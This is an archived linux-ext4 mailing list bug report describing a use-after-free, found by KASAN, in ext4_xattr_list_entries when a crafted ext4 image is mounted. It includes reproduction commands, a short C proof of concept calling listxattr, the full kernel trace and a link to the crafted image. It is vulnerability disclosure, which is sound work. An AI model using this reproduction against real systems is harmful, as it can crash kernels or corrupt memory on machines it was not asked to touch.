| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <C9CCA80F-A93C-4198-A44E-0812B2F3D1B6@gatech.edu>
Date: Fri, 8 Jun 2018 04:20:19 +0000
From: "Xu, Wen" <wen.xu@...ech.edu>
To: "linux-ext4@...r.kernel.org" <linux-ext4@...r.kernel.org>
Subject: use-after-free() detected by KASAN in ext4_xattr_list_entries() when
mounting and operating a crafted ext4 image
- Overview
ext4: use-after-free() detected by KASAN when mounting and operating a crafted ext4 image
- Reproduce (on a KASAN build of 4.17-rc4)
# mkdir mnt
# mount -t ext4 242.img mnt
# gcc -o poc poc.c
# ./poc ./mnt
- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
static void activity(char *mpoint) {
char *xattr;
int err;
err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint);
char buf2[113];
memset(buf2, 0, sizeof(buf2));
listxattr(xattr, buf2, sizeof(buf2));
}
int main(int argc, char *argv[]) {
activity(argv[1]);
return 0;
}
- Kernel message
[ 382.459225] EXT4-fs (loop0): mounted filesystem with ordered data mode. Opts: (null)
[ 389.596693] ==================================================================
[ 389.598395] BUG: KASAN: use-after-free in ext4_xattr_list_entries+0x120/0x190
[ 389.599925] Read of size 4 at addr ffff8801f0d00080 by task a.out/1376
[ 389.601669] CPU: 0 PID: 1376 Comm: a.out Not tainted 4.17.0-rc4+ #5
[ 389.601672] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 389.601679] Call Trace:
[ 389.601719] dump_stack+0x7b/0xb5
[ 389.601754] print_address_description+0x70/0x290
[ 389.601760] kasan_report+0x291/0x390
[ 389.601765] ? ext4_xattr_list_entries+0x120/0x190
[ 389.601771] __asan_load4+0x78/0x80
[ 389.601776] ext4_xattr_list_entries+0x120/0x190
[ 389.601781] ext4_listxattr+0x32e/0x5f0
[ 389.601787] ? ext4_xattr_get+0x4d0/0x4d0
[ 389.601791] ? __kmalloc_node+0x11e/0x2e0
[ 389.601796] ? ext4_xattr_get+0x4d0/0x4d0
[ 389.601813] vfs_listxattr+0x9d/0xc0
[ 389.601818] listxattr+0x58/0xd0
[ 389.601823] path_listxattr+0xb9/0x120
[ 389.601828] ? listxattr+0xd0/0xd0
[ 389.601839] ? vm_brk+0x20/0x20
[ 389.601845] __x64_sys_listxattr+0x48/0x50
[ 389.601869] do_syscall_64+0x78/0x170
[ 389.601885] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 389.601903] RIP: 0033:0x7fcf8ac8a0d7
[ 389.601906] RSP: 002b:00007ffc8733aa58 EFLAGS: 00000202 ORIG_RAX: 00000000000000c2
[ 389.601916] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fcf8ac8a0d7
[ 389.601918] RDX: 0000000000000071 RSI: 00007ffc8733aa80 RDI: 00000000015a5080
[ 389.601921] RBP: 00007ffc8733ab00 R08: 00000000015a5010 R09: 0000000000000000
[ 389.601923] R10: 00000000000001ab R11: 0000000000000202 R12: 0000000000400550
[ 389.601926] R13: 00007ffc8733ac00 R14: 0000000000000000 R15: 0000000000000000
[ 389.602286] Allocated by task 464:
[ 389.603041] save_stack+0x46/0xd0
[ 389.603046] kasan_kmalloc+0xad/0xe0
[ 389.603050] kasan_slab_alloc+0x11/0x20
[ 389.603054] kmem_cache_alloc+0xd1/0x1e0
[ 389.603080] skb_clone+0x91/0x160
[ 389.603102] netlink_broadcast_filtered+0x4f7/0x600
[ 389.603110] netlink_sendmsg+0x676/0x6e0
[ 389.603121] sock_sendmsg+0x76/0x80
[ 389.603126] ___sys_sendmsg+0x4cd/0x4e0
[ 389.603130] __sys_sendmsg+0xea/0x170
[ 389.603134] __x64_sys_sendmsg+0x48/0x50
[ 389.603138] do_syscall_64+0x78/0x170
[ 389.603143] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 389.603486] Freed by task 464:
[ 389.604150] save_stack+0x46/0xd0
[ 389.604154] __kasan_slab_free+0x13c/0x1a0
[ 389.604158] kasan_slab_free+0xe/0x10
[ 389.604161] kmem_cache_free+0x89/0x1e0
[ 389.604165] kfree_skbmem+0x92/0xa0
[ 389.604169] kfree_skb+0x5e/0xf0
[ 389.604173] netlink_broadcast_filtered+0x470/0x600
[ 389.604176] netlink_sendmsg+0x676/0x6e0
[ 389.604180] sock_sendmsg+0x76/0x80
[ 389.604184] ___sys_sendmsg+0x4cd/0x4e0
[ 389.604187] __sys_sendmsg+0xea/0x170
[ 389.604191] __x64_sys_sendmsg+0x48/0x50
[ 389.604195] do_syscall_64+0x78/0x170
[ 389.604200] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 389.604547] The buggy address belongs to the object at ffff8801f0d00000
which belongs to the cache skbuff_head_cache of size 208
[ 389.607302] The buggy address is located 128 bytes inside of
208-byte region [ffff8801f0d00000, ffff8801f0d000d0)
[ 389.609737] The buggy address belongs to the page:
[ 389.610763] page:ffffea0007c34000 count:1 mapcount:0 mapping:0000000000000000 index:0x0
[ 389.612457] flags: 0x2ffff0000000100(slab)
[ 389.613340] raw: 02ffff0000000100 0000000000000000 0000000000000000 00000001000c000c
[ 389.614972] raw: ffffea00077d8940 0000000b0000000b ffff8801f5808540 0000000000000000
[ 389.616588] page dumped because: kasan: bad access detected
[ 389.618099] Memory state around the buggy address:
[ 389.625195] ffff8801f0cfff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 389.626736] ffff8801f0d00000: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 389.628279] >ffff8801f0d00080: fb fb fb fb fb fb fb fb fb fb fc fc fc fc fc fc
[ 389.629799] ^
[ 389.630497] ffff8801f0d00100: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
[ 389.632027] ffff8801f0d00180: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 389.633542] ==================================================================
[ 389.635079] Disabling lock debugging due to kernel taint
- Analysis
https://elixir.bootlin.com/linux/v4.17-rc7/source/fs/ext4/xattr.c#L663
for (; !IS_LAST_ENTRY(entry); entry = EXT4_XATTR_NEXT(entry)) {
const struct xattr_handler *handler =
ext4_xattr_handler(entry->e_name_index);
Based on KASAN report, a dangling ext4_xattr_entry pointer is accessed during the execution of POC.
Files:
242.img.zip: https://bugzilla.kernel.org/attachment.cgi?id=276381
Note that to reproduce the bug on KASAN build, several tries may be required.
Reported by Wen Xu (wen.xu@...ech.edu) from SSLab at Gatech.
Powered by blists - more mailing lists